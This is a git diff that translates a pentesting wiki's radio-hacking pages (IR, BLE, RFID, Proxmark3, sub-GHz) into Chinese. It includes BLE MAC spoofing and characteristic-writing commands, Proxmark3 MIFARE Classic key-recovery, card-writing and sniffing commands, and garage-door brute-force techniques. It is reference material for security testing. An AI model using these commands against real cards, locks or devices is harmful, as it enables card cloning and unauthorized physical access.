-> There are IR protocols that are **trying to become universal** for several types of devices. The most famous ones are RC5 and NEC. Unfortunately, the most famous **does not mean the most common**. In my environment, I met just two NEC remotes and no RC5 ones.
+> 有些红外协议**试图成为多种设备的通用协议**。最著名的有RC5和NEC。不幸的是，最著名**并不意味着最常见**。在我的环境中，我只遇到过两个NEC遥控器，而没有RC5遥控器。
 >
-> Manufacturers love to use their own unique IR protocols, even within the same range of devices (for example, TV-boxes). Therefore, remotes from different companies and sometimes from different models from the same company, are unable to work with other devices of the same type.
+> 制造商喜欢使用自己独特的红外协议，即使在同一系列设备中（例如，电视盒）。因此，不同公司的遥控器，有时甚至是同一公司不同型号的遥控器，无法与同类设备配合使用。
 
-### Exploring an IR signal
+### 探索红外信号
 
-The most reliable way to see how the remote IR signal looks like is to use an oscilloscope. It does not demodulate or invert the received signal, it is just displayed "as is". This is useful for testing and debugging. I will show the expected signal on the example of the NEC IR protocol.
+查看遥控器红外信号的最可靠方法是使用示波器。它不会解调或反转接收到的信号，而是“原样”显示。这对于测试和调试非常有用。我将以NEC红外协议为例展示预期信号。
 
 <figure><img src="../../images/image (235).png" alt=""><figcaption></figcaption></figure>
 
-Usually, there is a preamble at the beginning of an encoded packet. This allows the receiver to determine the level of gain and background. There are also protocols without preamble, for example, Sharp.
+通常，编码数据包的开头有一个前导码。这使接收器能够确定增益和背景水平。也有没有前导码的协议，例如，夏普。
 
-Then data is transmitted. The structure, preamble, and bit encoding method are determined by the specific protocol.
+然后传输数据。结构、前导码和位编码方法由特定协议决定。
 
-**NEC IR protocol** contains a short command and a repeat code, which is sent while the button is pressed. Both the command and the repeat code have the same preamble at the beginning.
+**NEC红外协议**包含一个短命令和一个重复码，在按下按钮时发送。命令和重复码在开头都有相同的前导码。
 
-NEC **command**, in addition to the preamble, consists of an address byte and a command-number byte, by which the device understands what needs to be performed. Address and command-number bytes are duplicated with inverse values, to check the integrity of the transmission. There is an additional stop bit at the end of the command.
+NEC **命令**除了前导码外，还由一个地址字节和一个命令编号字节组成，设备通过这些字节理解需要执行的操作。地址和命令编号字节用反向值进行重复，以检查传输的完整性。命令末尾有一个额外的停止位。
 
-The **repeat code** has a "1" after the preamble, which is a stop bit.
+**重复码**在前导码后有一个“1”，这是一个停止位。
 
-For **logic "0" and "1"** NEC uses Pulse Distance Encoding: first, a pulse burst is transmitted after which there is a pause, its length sets the value of the bit.
+对于**逻辑“0”和“1”**，NEC使用脉冲间距编码：首先传输一个脉冲爆发，然后是一个暂停，其长度设置位的值。
 
-### Air Conditioners
+### 空调
 
-Unlike other remotes, **air conditioners do not transmit just the code of the pressed button**. They also **transmit all the information** when a button is pressed to assure that the **air conditioned machine and the remote are synchronised**.\
-This will avoid that a machine set as 20ºC is increased to 21ºC with one remote, and then when another remote, which still has the temperature as 20ºC, is used to increase more the temperature, it will "increase" it to 21ºC (and not to 22ºC thinking it's in 21ºC).
+与其他遥控器不同，**空调不仅仅传输按下按钮的代码**。它们还**在按下按钮时传输所有信息**，以确保**空调和遥控器同步**。\
+这将避免将设置为20ºC的机器用一个遥控器增加到21ºC，然后当使用另一个仍然将温度设置为20ºC的遥控器进一步增加温度时，它会“增加”到21ºC（而不是22ºC，以为它在21ºC）。
 
-### Attacks
+### 攻击
 
-You can attack Infrared with Flipper Zero:
+您可以使用Flipper Zero攻击红外线：
 
 {{#ref}}
 flipper-zero/fz-infrared.md
 {{#endref}}
 
-## References
+## 参考文献
 
 - [https://blog.flipperzero.one/infrared/](https://blog.flipperzero.one/infrared/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/low-power-wide-area-network.md b/src/todo/radio-hacking/low-power-wide-area-network.md
index 369b139a2..9d6490a0e 100644
--- a/src/todo/radio-hacking/low-power-wide-area-network.md
+++ b/src/todo/radio-hacking/low-power-wide-area-network.md
@@ -1,17 +1,16 @@
-# Low-Power Wide Area Network
+# 低功耗广域网
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Introduction
+## 介绍
 
-**Low-Power Wide Area Network** (LPWAN) is a group of wireless, low-power, wide area network technologies designed for **long-range communications** at a low bit rate.\
-They can reach more than **six miles** and their **batteries** can last up to **20 years**.
+**低功耗广域网** (LPWAN) 是一组无线、低功耗、广域网技术，旨在实现**长距离通信**，并具有低比特率。\
+它们的通信距离可以超过**六英里**，其**电池**寿命可达**20年**。
 
-Long Range (**LoRa**) it’s popular in multiple countries and has an open source specification called **LoRaWAN**.
+长距离 (**LoRa**) 在多个国家中很受欢迎，并具有一个名为 **LoRaWAN** 的开源规范。
 
-### LPWAN, LoRa, and LoRaWAN
+### LPWAN、LoRa 和 LoRaWAN
 
 [https://github.com/IOActive/laf](https://github.com/IOActive/laf)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 6ecba8e30..c9f607016 100644
--- a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -2,24 +2,23 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Introduction
+## 介绍
 
-Available since the Bluetooth 4.0 specification, BLE uses only 40 channels, covering the range of 2400 to 2483.5 MHz. In contrast, traditional Bluetooth uses 79 channels in that same range.
+自 Bluetooth 4.0 规范发布以来，BLE 仅使用 40 个频道，覆盖 2400 到 2483.5 MHz 的范围。相比之下，传统蓝牙在同一范围内使用 79 个频道。
 
-BLE devices communicate is by sending **advertising packets** (**beacons**), these packets broadcast the BLE device’s existence to other nearby devices. These beacons sometimes **send data**, too.
+BLE 设备通过发送 **advertising packets** (**beacons**) 进行通信，这些数据包向其他附近设备广播 BLE 设备的存在。这些信标有时也会 **send data**。
 
-The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldn’t fit on the initial advertising request, such as the full device name.
+监听设备，也称为中央设备，可以通过发送特定于广告设备的 **SCAN request** 来响应广告数据包。对该扫描的 **response** 使用与 **advertising** 数据包相同的结构，并包含无法在初始广告请求中容纳的附加信息，例如完整的设备名称。
 
 ![](<../../images/image (152).png>)
 
-The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV_NONCONN_IND and ADV_IND. Devices use the **ADV_NONCONN_IND** PDU type if they **don’t accept connections**, transmitting data only in the advertising packet. Devices use **ADV_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.
+前导字节同步频率，而四字节访问地址是 **connection identifier**，用于多个设备尝试在同一频道上建立连接的场景。接下来，协议数据单元 (**PDU**) 包含 **advertising data**。有几种类型的 PDU；最常用的是 ADV_NONCONN_IND 和 ADV_IND。如果设备 **don’t accept connections**，则使用 **ADV_NONCONN_IND** PDU 类型，仅在广告数据包中传输数据。如果设备 **allow connections**，并且在 **connection** 建立后 **stop sending advertising** 数据包，则使用 **ADV_IND**。
 
 ### GATT
 
-The **Generic Attribute Profile** (GATT) defines how the **device should format and transfer data**. When you’re analyzing a BLE device’s attack surface, you’ll often concentrate your attention on the GATT (or GATTs), because it’s how **device functionality gets triggered** and how data gets stored, grouped, and modified. The GATT lists a device’s characteristics, descriptors, and services in a table as either 16- or 32-bits values. A **characteristic** is a **data** value **sent** between the central device and peripheral. These characteristics can have **descriptors** that **provide additional information about them**. **Characteristics** are often **grouped** in **services** if they’re related to performing a particular action.
+**Generic Attribute Profile** (GATT) 定义了 **device should format and transfer data** 的方式。当您分析 BLE 设备的攻击面时，您通常会将注意力集中在 GATT（或 GATTs）上，因为它是 **device functionality gets triggered** 和数据存储、分组及修改的方式。GATT 以表格形式列出设备的特征、描述符和服务，值为 16 位或 32 位。**characteristic** 是在中央设备和外设之间 **sent** 的 **data** 值。这些特征可以具有 **descriptors**，以 **provide additional information about them**。如果 **Characteristics** 相关于执行特定操作，通常会在 **services** 中 **grouped**。 
 
 ## Enumeration
-
 ```bash
 hciconfig #Check config, check if UP or DOWN
 # If DOWN try:
@@ -29,20 +28,18 @@ sudo hciconfig hci0 down && sudo hciconfig hci0 up
 # Spoof MAC
 spooftooph -i hci0 -a 11:22:33:44:55:66
 ```
-
 ### GATTool
 
-**GATTool** allows to **establish** a **connection** with another device, listing that device’s **characteristics**, and reading and writing its attributes.\
-GATTTool can launch an interactive shell with the `-I` option:
-
+**GATTool** 允许与另一个设备 **建立** **连接**，列出该设备的 **特性**，并读取和写入其属性。\
+GATTTool 可以使用 `-I` 选项启动交互式 shell：
 ```bash
 gatttool -i hci0 -I
 [ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
 [A4:CF:12:6C:B3:76][LE]> characteristics
-  handle: 0x0002, char properties: 0x20, char value handle:
-  0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
-  handle: 0x0015, char properties: 0x02, char value handle:
-  0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
+handle: 0x0002, char properties: 0x20, char value handle:
+0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
+handle: 0x0015, char properties: 0x02, char value handle:
+0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
 [...]
 
 # Write data
@@ -55,9 +52,7 @@ gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read
 # Read connecting with an authenticated encrypted connection
 gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
 ```
-
 ### Bettercap
-
 ```bash
 # Start listening for beacons
 sudo bettercap --eval "ble.recon on"
@@ -69,6 +64,4 @@ sudo bettercap --eval "ble.recon on"
 >> ble.write <MAC ADDR> <UUID> <HEX DATA>
 >> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/pentesting-rfid.md b/src/todo/radio-hacking/pentesting-rfid.md
index 44c0e32dc..d4f62912b 100644
--- a/src/todo/radio-hacking/pentesting-rfid.md
+++ b/src/todo/radio-hacking/pentesting-rfid.md
@@ -2,99 +2,98 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Introduction
+## 介绍
 
-**Radio Frequency Identification (RFID)** is the most popular short-range radio solution. It's usually used to store and transmit information that identifies an entity.
+**射频识别 (RFID)** 是最流行的短距离无线解决方案。它通常用于存储和传输识别实体的信息。
 
-An RFID tag can rely on **its own power source (active)**, such as an embedded battery, or receive its power from the reading antenna using the current **induced from the received radio waves** (**passive**).
+RFID 标签可以依赖于 **自身电源 (主动)**，例如嵌入式电池，或通过读取天线接收来自接收无线电波的电流 **（被动）**。
 
-### Classes
+### 类别
 
-EPCglobal divides RFID tags into six categories. A tag in each category has all the capabilities listed in the previous category, making it backward compatible.
+EPCglobal 将 RFID 标签分为六类。每个类别中的标签都具备前一类别中列出的所有功能，从而实现向后兼容。
 
-- **Class 0** tags are **passive** tags that operate in **UHF** bands. The vendor **preprograms** them at the production factory. As a result, you **can’t change** the information stored in their memory.
-- **Class 1** tags can also operate in **HF** bands. In addition, they can be **written only once** after production. Many Class 1 tags can also process **cyclic redundancy checks** (CRCs) of the commands they receive. CRCs are a few extra bytes at the end of the commands for error detection.
-- **Class 2** tags can be **written multiple times**.
-- **Class 3** tags can contain **embedded sensors** that can record environmental parameters, such as the current temperature or the tag’s motion. These tags are **semi-passive**, because although they **have** an embedded power source, such as an integrated **battery**, they **can’t initiate** wireless **communication** with other tags or readers.
-- **Class 4** tags can initiate communication with other tags of the same class, making them **active tags**.
-- **Class 5** tags can provide **power to other tags and communicate with all the previous tag** classes. Class 5 tags can act as **RFID readers**.
+- **Class 0** 标签是 **被动** 标签，工作在 **UHF** 频段。供应商在生产工厂 **预编程** 它们。因此，您 **无法更改** 存储在其内存中的信息。
+- **Class 1** 标签也可以在 **HF** 频段工作。此外，它们在生产后只能 **写入一次**。许多 Class 1 标签还可以处理接收到的命令的 **循环冗余检查** (CRCs)。CRC 是命令末尾的几个额外字节，用于错误检测。
+- **Class 2** 标签可以 **多次写入**。
+- **Class 3** 标签可以包含 **嵌入式传感器**，可以记录环境参数，例如当前温度或标签的运动。这些标签是 **半主动** 的，因为尽管它们 **具有** 嵌入式电源，例如集成 **电池**，但它们 **无法发起** 与其他标签或读取器的无线 **通信**。
+- **Class 4** 标签可以与同类的其他标签发起通信，使其成为 **主动标签**。
+- **Class 5** 标签可以为其他标签提供 **电源并与所有先前的标签** 类别进行通信。Class 5 标签可以充当 **RFID 读取器**。
 
-### Information Stored in RFID Tags
+### RFID 标签中存储的信息
 
-An RFID tag’s memory usually stores four kinds of data: the **identification data**, which **identifies** the **entity** to which the tag is attached (this data includes user-defined fields, such as bank accounts); the **supplementary data**, which provides **further** **details** regarding the entity; the **control data**, used for the tag’s internal **configuration**; and the tag’s **manufacturer data**, which contains a tag’s Unique Identifier (**UID**) and details regarding the tag’s **production**, **type**, and **vendor**. You’ll find the first two kinds of data in all the commercial tags; the last two can differ based on the tag’s vendor.
+RFID 标签的内存通常存储四种数据：**识别数据**，用于 **识别** 标签所附着的 **实体**（这些数据包括用户定义的字段，例如银行账户）；**补充数据**，提供有关实体的 **进一步** **细节**；**控制数据**，用于标签的内部 **配置**；以及标签的 **制造商数据**，其中包含标签的唯一标识符 (**UID**) 以及有关标签的 **生产**、**类型** 和 **供应商** 的详细信息。您将在所有商业标签中找到前两种数据；最后两种数据可能会根据标签的供应商而有所不同。
 
-The ISO standard specifies the Application Family Identifier (**AFI**) value, a code that indicates the **kind of object** the tag belongs to. Another important register, also specified by ISO, is the Data Storage Format Identifier(**DSFID**), which defines the **logical organization of the user data**.
+ISO 标准指定了应用程序系列标识符 (**AFI**) 值，这是一个指示标签所属 **对象类型** 的代码。另一个由 ISO 指定的重要寄存器是数据存储格式标识符 (**DSFID**)，它定义了 **用户数据的逻辑组织**。
 
-Most RFID **security controls** have mechanisms that **restrict** the **read** or **write** operations on each user memory block and on the special registers containing the AFI and DSFID values. These **lock** **mechanisms** use data stored in the control memory and have **default passwords** preconfigured by the vendor but allow the tag owners to **configure custom passwords**.
+大多数 RFID **安全控制** 具有机制，**限制** 每个用户内存块以及包含 AFI 和 DSFID 值的特殊寄存器上的 **读取** 或 **写入** 操作。这些 **锁定** **机制** 使用存储在控制内存中的数据，并具有供应商预配置的 **默认密码**，但允许标签所有者 **配置自定义密码**。
 
-### Low & High frequency tags comparison
+### 低频与高频标签比较
 
 <figure><img src="../../images/image (983).png" alt=""><figcaption></figcaption></figure>
 
-## Low-Frequency RFID Tags (125kHz)
+## 低频 RFID 标签 (125kHz)
 
-**Low-frequency tags** are often used in systems that **do not require high security**: building access, intercom keys, gym membership cards, etc. Due to their higher range, they are convenient to use for paid car parking: the driver does not need to bring the card close to the reader, as it is triggered from further away. At the same time, low-frequency tags are very primitive, they have a low data transfer rate. For that reason, it's impossible to implement complex two-way data transfer for such things as keeping balance and cryptography. Low-frequency tags only transmit their short ID without any means of authentication.
+**低频标签** 通常用于 **不需要高安全性** 的系统：建筑物访问、对讲机钥匙、健身会员卡等。由于其较高的范围，它们在付费停车时使用方便：司机无需将卡靠近读取器，因为它可以在更远的地方触发。同时，低频标签非常原始，数据传输速率低。因此，无法实现复杂的双向数据传输，例如保持余额和加密。低频标签仅传输其短 ID，而没有任何身份验证手段。
 
-These devices rely on **passive** **RFID** technology and operate in a **range of 30 kHz to 300 kHz**, although it's more usual to use 125 kHz to 134 kHz:
+这些设备依赖于 **被动** **RFID** 技术，工作在 **30 kHz 到 300 kHz** 的范围内，尽管通常使用 125 kHz 到 134 kHz：
 
-- **Long Range** — lower frequency translates to higher range. There are some EM-Marin and HID readers, which work from a distance of up to a meter. These are often used in car parking.
-- **Primitive protocol** — due to the low data transfer rate these tags can only transmit their short ID. In most cases, data is not authenticated and it's not protected in any way. As soon as the card is in the range of the reader it just starts transmitting its ID.
-- **Low security** — These cards can be easily copied, or even read from somebody else's pocket due to the protocol's primitiveness.
+- **长距离** — 较低的频率意味着更高的范围。有一些 EM-Marin 和 HID 读取器，可以在距离达一米的地方工作。这些通常用于停车场。
+- **原始协议** — 由于数据传输速率低，这些标签只能传输其短 ID。在大多数情况下，数据没有经过身份验证，也没有以任何方式受到保护。只要卡在读取器的范围内，它就会开始传输其 ID。
+- **低安全性** — 这些卡可以很容易地被复制，甚至可以从其他人的口袋中读取，因为协议的原始性。
 
-**Popular 125 kHz protocols:**
+**流行的 125 kHz 协议：**
 
-- **EM-Marin** — EM4100, EM4102. The most popular protocol in CIS. Can be read from about a meter because of its simplicity and stability.
-- **HID Prox II** — low-frequency protocol introduced by HID Global. This protocol is more popular in the western countries. It is more complex and the cards and readers for this protocol are relatively expensive.
-- **Indala** — very old low-frequency protocol that was introduced by Motorola, and later acquired by HID. You are less likely to encounter it in the wild compared to the previous two because it is falling out of use.
+- **EM-Marin** — EM4100, EM4102。CIS 中最流行的协议。由于其简单性和稳定性，可以在约一米的距离内读取。
+- **HID Prox II** — HID Global 引入的低频协议。该协议在西方国家更为流行。它更复杂，且该协议的卡和读取器相对昂贵。
+- **Indala** — 由摩托罗拉引入的非常古老的低频协议，后来被 HID 收购。与前两者相比，您在野外遇到它的可能性较小，因为它正在逐渐被淘汰。
 
-In reality, there are a lot more low-frequency protocols. But they all use the same modulation on the physical layer and may be considered, in one way or another, a variation of those listed above.
+实际上，还有更多低频协议。但它们都在物理层上使用相同的调制方式，可以被视为上述协议的某种变体。
 
-### Attack
+### 攻击
 
-You can **attack these Tags with the Flipper Zero**:
+您可以 **使用 Flipper Zero 攻击这些标签**：
 
 {{#ref}}
 flipper-zero/fz-125khz-rfid.md
 {{#endref}}
 
-## High-Frequency RFID Tags (13.56 MHz)
+## 高频 RFID 标签 (13.56 MHz)
 
-**High-frequency tags** are used for a more complex reader-tag interaction when you need cryptography, a large two-way data transfer, authentication, etc.\
-It's usually found in bank cards, public transport, and other secure passes.
+**高频标签** 用于更复杂的读取器-标签交互，当您需要加密、大量双向数据传输、身份验证等时。\
+它通常出现在银行卡、公共交通和其他安全通行证中。
 
-**High-frequency 13.56 MHz tags are a set of standards and protocols**. They are usually referred to as [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/), but that's not always correct. The basic protocol set used on the physical and logical levels is ISO 14443. High-level protocols, as well as alternative standards (like ISO 19092), are based upon it. Many people refer to this technology as **Near Field Communication (NFC)**, a term for devices operating over the 13.56 MHz frequency.
+**高频 13.56 MHz 标签是一组标准和协议**。它们通常被称为 [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/)，但这并不总是正确。物理和逻辑层上使用的基本协议集是 ISO 14443。高级协议以及替代标准（如 ISO 19092）基于此。许多人将此技术称为 **近场通信 (NFC)**，这是指在 13.56 MHz 频率上运行的设备。
 
 <figure><img src="../../images/image (930).png" alt=""><figcaption></figcaption></figure>
 
-To put it simply, NFC's architecture works like this: the transmission protocol is chosen by the company making the cards and implemented based on the low-level ISO 14443. For example, NXP invented its own high-level transmission protocol called Mifare. But on the lower level, Mifare cards are based on ISO 14443-A standard.
+简单来说，NFC 的架构是这样的：传输协议由制造卡片的公司选择，并基于低级 ISO 14443 实施。例如，NXP 发明了自己的高级传输协议，称为 Mifare。但在较低层面上，Mifare 卡基于 ISO 14443-A 标准。
 
-Flipper can interact with both the low-level ISO 14443 protocol, as well as Mifare Ultralight data transfer protocol and EMV used in bank cards. We're working on adding support for Mifare Classic and NFC NDEF. A thorough look at the protocols and standards that make up NFC is worth a separate article which we plan to have up later.
+Flipper 可以与低级 ISO 14443 协议以及 Mifare Ultralight 数据传输协议和用于银行卡的 EMV 进行交互。我们正在努力添加对 Mifare Classic 和 NFC NDEF 的支持。深入研究构成 NFC 的协议和标准值得单独撰写一篇文章，我们计划稍后发布。
 
-All high-frequency cards based on ISO 14443-A standard have a unique chip ID. It acts as the card's serial number, like a network card's MAC address. **Usually, the UID is 4 or 7 bytes long**, but can rarely go **up to 10**. UIDs are not a secret and they are easily readable, **sometimes even printed on the card itself**.
+所有基于 ISO 14443-A 标准的高频卡都有一个唯一的芯片 ID。它充当卡的序列号，类似于网络卡的 MAC 地址。**通常，UID 长度为 4 或 7 字节**，但很少可以 **达到 10**。UID 不是秘密，且很容易读取，**有时甚至印在卡片上**。
 
-There are many access control systems that rely on UID to **authenticate and grant access**. Sometimes this happens **even** when RFID tags **support cryptography**. Such **misuse** brings them down to the level of the dumb **125 kHz cards** in terms of **security**. Virtual cards (like Apple Pay) use a dynamic UID so that phone owners won't go opening doors with their payment app.
+有许多访问控制系统依赖 UID 来 **进行身份验证和授予访问**。有时即使 RFID 标签 **支持加密**，这也会发生。这种 **误用** 使它们在 **安全性** 上降至愚蠢的 **125 kHz 卡** 的水平。虚拟卡（如 Apple Pay）使用动态 UID，以便手机用户不会用他们的支付应用打开门。
 
-- **Low range** — high-frequency cards are specifically designed so that they would have to be placed close to the reader. This also helps to protect the card from unauthorized interactions. The maximum read range that we managed to achieve was about 15 cm, and that was with custom-made high-range readers.
-- **Advanced protocols** — data transfer speeds up to 424 kbps allow complex protocols with full-fledged two-way data transfer. Which in turn **allows cryptography**, data transfer, etc.
-- **High security** — high-frequency contactless cards are in no way inferior to smart cards. There are cards that support cryptographically strong algorithms like AES and implement asymmetrical cryptography.
+- **低范围** — 高频卡专门设计为必须靠近读取器放置。这也有助于保护卡免受未经授权的交互。我们所能达到的最大读取范围约为 15 厘米，而那是使用定制的高范围读取器。
+- **高级协议** — 数据传输速度高达 424 kbps，允许复杂的协议进行完整的双向数据传输。这反过来 **允许加密**、数据传输等。
+- **高安全性** — 高频非接触卡在任何方面都不逊色于智能卡。有些卡支持强加密算法，如 AES，并实现非对称加密。
 
-### Attack
+### 攻击
 
-You can **attack these Tags with the Flipper Zero**:
+您可以 **使用 Flipper Zero 攻击这些标签**：
 
 {{#ref}}
 flipper-zero/fz-nfc.md
 {{#endref}}
 
-Or using the **proxmark**:
+或者使用 **proxmark**：
 
 {{#ref}}
 proxmark-3.md
 {{#endref}}
 
-## References
+## 参考
 
 - [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/proxmark-3.md b/src/todo/radio-hacking/proxmark-3.md
index 1d510b3e9..f129e9a3d 100644
--- a/src/todo/radio-hacking/proxmark-3.md
+++ b/src/todo/radio-hacking/proxmark-3.md
@@ -2,18 +2,17 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Attacking RFID Systems with Proxmark3
+## 使用 Proxmark3 攻击 RFID 系统
 
-The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
+您需要做的第一件事是拥有一个 [**Proxmark3**](https://proxmark.com) 并 [**安装软件及其依赖项**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)。
 
-### Attacking MIFARE Classic 1KB
+### 攻击 MIFARE Classic 1KB
 
-It has **16 sectors**, each of them has **4 blocks** and each block contains **16B**. The UID is in sector 0 block 0 (and can't be altered).\
-To access each sector you need **2 keys** (**A** and **B**) which are stored in **block 3 of each sector** (sector trailer). The sector trailer also stores the **access bits** that give the **read and write** permissions on **each block** using the 2 keys.\
-2 keys are useful to give permissions to read if you know the first one and write if you know the second one (for example).
-
-Several attacks can be performed
+它有 **16 个扇区**，每个扇区有 **4 个块**，每个块包含 **16B**。UID 位于扇区 0 块 0（无法更改）。\
+要访问每个扇区，您需要 **2 个密钥**（**A** 和 **B**），这些密钥存储在 **每个扇区的块 3**（扇区尾部）。扇区尾部还存储 **访问位**，这些位使用 2 个密钥提供 **每个块的读写**权限。\
+2 个密钥可以用于提供读取权限，如果您知道第一个密钥，则可以读取；如果您知道第二个密钥，则可以写入（例如）。
 
+可以执行多种攻击
 ```bash
 proxmark3> hf mf #List attacks
 
@@ -32,34 +31,28 @@ proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to
 proxmark3> hf mf eget 01 # Read block 1
 proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
 ```
+Proxmark3 允许执行其他操作，例如 **窃听** 标签与读卡器之间的通信，以尝试找到敏感数据。在这张卡中，您可以仅仅嗅探通信并计算所使用的密钥，因为 **使用的加密操作很弱**，并且知道明文和密文后，您可以计算它（`mfkey64` 工具）。
 
-The Proxmark3 allows to perform other actions like **eavesdropping** a **Tag to Reader communication** to try to find sensitive data. In this card you could just sniff the communication with and calculate the used key because the **cryptographic operations used are weak** and knowing the plain and cipher text you can calculate it (`mfkey64` tool).
-
-### Raw Commands
-
-IoT systems sometimes use **nonbranded or noncommercial tags**. In this case, you can use Proxmark3 to send custom **raw commands to the tags**.
+### 原始命令
 
+物联网系统有时使用 **非品牌或非商业标签**。在这种情况下，您可以使用 Proxmark3 向标签发送自定义 **原始命令**。
 ```bash
 proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
 SAK : 08 [2]
 TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
-  proprietary non iso14443-4 card found, RATS not supported
-  No chinese magic backdoor command detected
-  Prng detection: WEAK
-  Valid ISO14443A Tag Found - Quiting Search
+proprietary non iso14443-4 card found, RATS not supported
+No chinese magic backdoor command detected
+Prng detection: WEAK
+Valid ISO14443A Tag Found - Quiting Search
 ```
+通过这些信息，您可以尝试搜索有关卡片的信息以及与其通信的方法。Proxmark3 允许发送原始命令，例如：`hf 14a raw -p -b 7 26`
 
-With this information you could try to search information about the card and about the way to communicate with it. Proxmark3 allows to send raw commands like: `hf 14a raw -p -b 7 26`
-
-### Scripts
-
-The Proxmark3 software comes with a preloaded list of **automation scripts** that you can use to perform simple tasks. To retrieve the full list, use the `script list` command. Next, use the `script run` command, followed by the script’s name:
+### 脚本
 
+Proxmark3 软件附带了一份预加载的 **自动化脚本** 列表，您可以使用这些脚本来执行简单任务。要检索完整列表，请使用 `script list` 命令。接下来，使用 `script run` 命令，后跟脚本的名称：
 ```
 proxmark3> script run mfkeys
 ```
-
-You can create a script to **fuzz tag readers**, so copying the data of a **valid card** just write a **Lua script** that **randomize** one or more random **bytes** and check if the **reader crashes** with any iteration.
+您可以创建一个脚本来**模糊标签读取器**，因此复制**有效卡片**的数据，只需编写一个**Lua脚本**，对一个或多个随机**字节**进行**随机化**，并检查**读取器是否崩溃**。 
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/sub-ghz-rf.md b/src/todo/radio-hacking/sub-ghz-rf.md
index 47b089f28..e901242fe 100644
--- a/src/todo/radio-hacking/sub-ghz-rf.md
+++ b/src/todo/radio-hacking/sub-ghz-rf.md
@@ -4,34 +4,34 @@
 
 ## Garage Doors
 
-Garage door openers typically operate at frequencies in the 300-190 MHz range, with the most common frequencies being 300 MHz, 310 MHz, 315 MHz, and 390 MHz. This frequency range is commonly used for garage door openers because it is less crowded than other frequency bands and is less likely to experience interference from other devices.
+车库门开启器通常在300-190 MHz范围内工作，最常见的频率为300 MHz、310 MHz、315 MHz和390 MHz。这个频率范围通常用于车库门开启器，因为它比其他频段更不拥挤，并且不太可能受到其他设备的干扰。
 
 ## Car Doors
 
-Most car key fobs operate on either **315 MHz or 433 MHz**. These are both radio frequencies, and they are used in a variety of different applications. The main difference between the two frequencies is that 433 MHz has a longer range than 315 MHz. This means that 433 MHz is better for applications that require a longer range, such as remote keyless entry.\
-In Europe 433.92MHz is commonly used and in U.S. and Japan it's the 315MHz.
+大多数汽车钥匙遥控器在**315 MHz或433 MHz**上工作。这两者都是无线电频率，应用于多种不同的场合。这两种频率之间的主要区别是433 MHz的范围比315 MHz更长。这意味着433 MHz更适合需要更长范围的应用，例如远程无钥匙进入。\
+在欧洲，433.92MHz是常用的，而在美国和日本则是315MHz。
 
 ## **Brute-force Attack**
 
 <figure><img src="../../images/image (1084).png" alt=""><figcaption></figcaption></figure>
 
-If instead of sending each code 5 times (sent like this to make sure the receiver gets it) so just send it once, the time is reduced to 6mins:
+如果不将每个代码发送5次（这样发送是为了确保接收器接收到），而只发送一次，时间将减少到6分钟：
 
 <figure><img src="../../images/image (622).png" alt=""><figcaption></figcaption></figure>
 
-and if you **remove the 2 ms waiting** period between signals you can **reduce the time to 3minutes.**
+如果**去掉信号之间的2毫秒等待**时间，你可以**将时间减少到3分钟。**
 
-Moreover, by using the De Bruijn Sequence (a way to reduce the number of bits needed to send all the potential binary numbers to burteforce) this **time is reduced just to 8 seconds**:
+此外，通过使用De Bruijn序列（减少发送所有潜在二进制数字所需的位数的方法），这个**时间仅减少到8秒**：
 
 <figure><img src="../../images/image (583).png" alt=""><figcaption></figcaption></figure>
 
-Example of this attack was implemented in [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)
+此攻击的示例已在[https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)中实现。
 
-Requiring **a preamble will avoid the De Bruijn Sequence** optimization and **rolling codes will prevent this attack** (supposing the code is long enough to not be bruteforceable).
+要求**前导码将避免De Bruijn序列**优化，而**滚动代码将防止此攻击**（假设代码足够长，不易被暴力破解）。
 
 ## Sub-GHz Attack
 
-To attack these signals with Flipper Zero check:
+要攻击这些信号，请检查Flipper Zero：
 
 {{#ref}}
 flipper-zero/fz-sub-ghz.md
